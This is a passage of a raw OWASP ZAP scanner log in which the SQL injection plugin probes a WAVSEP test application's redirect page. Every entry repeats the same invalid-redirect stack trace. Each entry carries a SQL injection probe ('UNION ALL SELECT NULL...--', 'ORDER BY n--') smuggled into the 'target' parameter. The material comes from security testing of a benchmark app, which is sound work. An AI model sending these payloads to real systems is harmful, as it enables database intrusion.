org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682258 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682258 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682259 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682259 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682261 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 6167-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 6167-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682261 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682262 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682263 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682264 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682265 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682266 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682266 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682267 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 